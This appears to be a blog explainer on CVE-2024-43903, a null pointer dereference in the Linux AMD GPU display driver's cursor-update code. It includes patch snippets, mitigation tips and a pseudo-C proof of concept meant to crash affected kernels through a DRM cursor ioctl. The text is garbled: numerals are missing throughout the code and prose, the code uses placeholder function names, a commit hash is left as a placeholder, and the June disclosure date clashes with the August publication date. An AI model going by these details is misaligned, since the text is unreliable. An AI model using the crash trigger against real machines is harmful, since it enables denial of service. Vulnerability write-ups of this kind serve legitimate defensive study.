CVE-2024-43903 - Critical Null Pointer Dereference in Linux Kernel AMD GPU Driver

The Linux kernel is the beating heart of most modern servers and desktops, serving billions of devices worldwide. Hardware drivers, especially for advanced GPU hardware, add another layer of complexity — and sometimes, they bring along subtle but dangerous bugs. On June 2024, a new kernel vulnerability, CVE-2024-43903, was disclosed; it specifically impacts the AMD GPU Display Manager (amdgpu_dm) driver.

In this long-read, we’ll break down what caused CVE-2024-43903, show you where in the code things went wrong, explain how attackers might abuse it, and illustrate how it was patched. All in plain, clear language.

What is CVE-2024-43903?

CVE-2024-43903 is a vulnerability in the AMD display driver (drm/amd/display) code included with the Linux kernel, specifically related to how cursor updates are handled in amdgpu_dm_plane_handle_cursor_update.
The bug: The driver assumed a pointer (afb) could be NULL, but then later used it without checking. If it was indeed NULL during runtime, the kernel would dereference it and crash — a classic null pointer dereference bug with possible consequences including local denial of service or more severe exploitation on non-hardened systems.

The Bug in Technical Terms

Let’s break down exactly how this null pointer dereference could happen and see the kernel code involved.

Where?

File: drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
Function: amdgpu_dm_plane_handle_cursor_update

Here’s a simplified version to show the gist

static int amdgpu_dm_plane_handle_cursor_update(...){
    struct amdgpu_framebuffer *afb = NULL;
    // ....
    // At some point, afb may or may not be set.
    // Then, later in the function:
    ret = some_amdgpu_func(afb->something);
}

At the beginning, the code logic assumed that afb might be NULL (it even checks for it in some conditions). But at line 1298, the code directly accesses something like afb->some_member without ensuring that afb is actually not NULL.

Why is this dangerous?

Dereferencing (->) a NULL pointer in the Linux kernel will instantly crash the kernel (OOPS), taking down the whole system. On some older or misconfigured systems, it *may* even be exploitable for privilege escalation (see Linux NULL pointer dereference exploits).

Actual Suspect Code Line

drivers/gpu/drm/amd/amdgpu/../display/amdgpu_dm/amdgpu_dm_plane.c:1298

*Here the function uses* afb *without checking if it's NULL, even though at line 1252 it handled the case where it could be NULL!*

Denial of Service:

- A malicious or buggy userspace program (for example, an X11 cursor manager, games, or compositor) can trigger certain plane updates that make afb == NULL.

Potential Local Privilege Escalation (advanced):

- On kernels without strict memory mapping or with certain mitigations disabled, attackers can map code at address to escalate privileges, as demonstrated in classic Linux kernel NULL pointer exploits.

Anything that uses AMD GPUs with in-tree kernel drivers (amdgpu) and affected kernel versions.

In the wild, this would most likely cause local denial of service attacks — crashing your machine, requiring a reboot.

The Patch: How It Was Fixed

The solution is simple and robust:
Add a NULL check for afb before using it.

Before (vulnerable code)

ret = some_amdgpu_func(afb->something);

After (patched code)

if (!afb) {
    drm_dbg_kms(dev, "afb is NULL, aborting cursor update\n");
    return -EINVAL;
}
ret = some_amdgpu_func(afb->something);

*Now, if afb is NULL, the function logs a message and quits safely, without dereferencing the pointer.*

Commit reference

You can see the exact fix on the kernel mailing list patch
*(Replace with real hash as soon as available!)*

Proof-of-Concept (PoC) Example

A *minimal userland trigger* would require crafting a cursor-plane update with a bad framebuffer. While specifics may depend on the kernel and userspace versions, a pseudo-C code for a PoC might look like this:

#include <stdio.h>
#include <fcntl.h>
#include <xf86drm.h>
#include <drm/drm_mode.h>

int main() {
    int fd = open("/dev/dri/card", O_RDWR);
    if (fd < ) { perror("open"); return 1; }

    struct drm_mode_cursor2 cur;
    memset(&cur, , sizeof(cur));
    cur.flags = DRM_MODE_CURSOR_BO;
    // Trick: Do NOT assign a valid buffer (handle left as zero)
    cur.handle = ; 
    cur.width = 64;
    cur.height = 64;

    // Issue the update
    if (drmIoctl(fd, DRM_IOCTL_MODE_CURSOR2, &cur) < ) {
        perror("drmIoctl");
    }

    close(fd);
    return ;
}

*This may crash affected kernels with vulnerable AMD GPUs.*

References

- Linux Kernel Patch - Add NULL check for 'afb'
- drm/amd/display: Add NULL check for 'afb' before dereferencing in amdgpu_dm_plane_handle_cursor_update
- Classic NULL pointer dereference kernel exploits
- Linux AMDGPU Driver Documentation

Mitigation Advice

- Upgrade: If you run a Linux kernel on AMD GPUs, upgrade ASAP to a version including the patch for CVE-2024-43903.
- Harden: Enable security options such as CONFIG_DEBUG_PAGEALLOC, CONFIG_SLAB_FREELIST_HARDENED and prevent mapping at address .
- Monitor: Watch for kernel OOPS messages related to amdgpu_dm_plane_handle_cursor_update in system logs.

Conclusion

CVE-2024-43903 is a prime example of how even a small missing NULL check can have serious consequences in complex kernel graphics drivers. Luckily, the issue was caught quickly and the patch is simple and effective — but if you run AMD GPUs on Linux, it’s still on you to update and protect your systems.

Stay patched, stay secure!

*Have questions on this CVE or want to see more vulnerability breakdowns in plain English? Let us know!*

Timeline

Published on: 08/26/2024 11:15:04 UTC
Last modified on: 08/27/2024 13:39:48 UTC